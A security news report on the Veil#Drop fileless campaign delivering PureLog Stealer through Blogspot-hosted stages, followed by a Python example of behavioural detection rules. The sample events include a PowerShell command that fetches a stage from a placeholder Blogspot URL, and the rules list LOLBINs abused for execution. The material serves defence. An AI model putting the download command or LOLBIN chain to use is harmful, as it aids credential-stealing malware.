A fileless malware framework has been abusing Google's Blogspot platform to deliver the PureLog Stealer entirely in memory, letting attackers steal credentials while leaving few traces on disk.
Securonix Threat Research, which named the framework Veil#Drop, said the campaign chains together compromised websites, a booby-trapped JavaScript file and PowerShell to reach its target.
PureLog Stealer is a known .NET infostealer, but the multi-stage delivery route is what sets this operation apart.
A Fileless Chain Built to Evade Detection
The attack began when a victim on a compromised website opened a file masquerading as a document. Because Windows hides known extensions by default, it appeared to be a PDF, but it was actually a script that Windows Script Host runs, launching PowerShell with security checks disabled.
From there, PowerShell fetched its next stages directly from attacker-controlled Blogspot pages and ran them in memory, without writing any files to disk.
The firm said hosting the payloads on Google-owned infrastructure let the traffic blend in with normal web activity and slip past reputation-based defenses.
The later stages hid their contents behind custom XOR encoding and only decoded at runtime. The researchers said the final loader rebuilt two .NET assemblies from encoded data and loaded them straight into memory using reflection, so no executable was ever dropped for antivirus to scan.
To ensure the payload ran even when that path was blocked, Veil#Drop fell back on trusted Microsoft-signed binaries, or LOLBINs, cycling through utilities such as RegSvcs, InstallUtil and MSBuild until one succeeded.
Because these binaries are legitimate parts of the .NET framework, the activity often slipped past application-control and allowlisting rules.
What PureLog Steals
Once running, PureLog Stealer went beyond simple credential theft, sweeping the machine for browser passwords, cookies, autofill data, cryptocurrency wallets and details of the host itself.
Securonix warned that stolen session cookies can let attackers bypass multi-factor authentication (MFA) by reusing a victim's logged-in session.
"In many cases, the operators behind information-stealing malware sell harvested credentials through underground marketplaces, allowing other threat actors to purchase access to compromised accounts and environments," the company explained.
Securonix also urged defenders to watch for the behavior behind Veil#Drop, such as PowerShell reaching out to Blogspot or spawning .NET utilities, rather than relying solely on static indicators.
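The behavioural checks Securonix recommends, written out as an added example that is not Securonix's own detection content: three rules run over constructed Sysmon-style process-creation events. The event fields, the wscript.exe parent and the Blogspot URL in the sample are assumptions for illustration, not indicators from the report.

```python
import re
from dataclasses import dataclass

# Assumed event shape: a Sysmon-style process-creation record (constructed, not real telemetry)
@dataclass
class ProcessEvent:
    image: str         # path of the created process
    parent_image: str  # path of the parent process
    command_line: str

POWERSHELL = {"powershell.exe", "pwsh.exe"}
# .NET utilities the report says Veil#Drop cycles through when the in-memory path is blocked
DOTNET_LOLBINS = {"regsvcs.exe", "installutil.exe", "msbuild.exe"}
BLOGSPOT_URL = re.compile(r"https?://[\w.-]*blogspot\.com", re.IGNORECASE)

def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def classify(ev: ProcessEvent) -> list:
    """Names of the behavioural rules an event triggers (empty list if none)."""
    img, parent = basename(ev.image), basename(ev.parent_image)
    hits = []
    if img in POWERSHELL and BLOGSPOT_URL.search(ev.command_line):
        hits.append("powershell_blogspot_download")      # stage fetched from Blogspot
    if img in POWERSHELL and parent == "wscript.exe":
        hits.append("wsh_spawns_powershell")             # script-as-document opened via WSH
    if img in DOTNET_LOLBINS and parent in POWERSHELL:
        hits.append("powershell_spawns_dotnet_lolbin")   # LOLBIN fallback path
    return hits

def scan(events):
    """Return (image, rules) for every event that triggers at least one rule."""
    return [(ev.image, classify(ev)) for ev in events if classify(ev)]

# Constructed sample events; the URL is a placeholder, not an indicator from the report
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\System32\wscript.exe",
                 'powershell.exe -c "iwr https://placeholder.blogspot.com/stage"'),
    ProcessEvent(r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "RegSvcs.exe"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\explorer.exe",
                 "powershell.exe Get-ChildItem"),            # ordinary interactive use
    ProcessEvent(r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
                 r"C:\Windows\System32\cmd.exe",
                 "MSBuild.exe build.proj"),                  # legitimate build, cmd parent
]

if __name__ == "__main__":
    for image, rules in scan(SAMPLE_EVENTS):
        print(f"{basename(image)}: {', '.join(rules)}")
```

The last two sample events show why the parent-process condition matters: PowerShell and MSBuild on their own are routine, and it is the chain (WSH to PowerShell to a .NET utility, plus the Blogspot fetch) that is worth alerting on.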
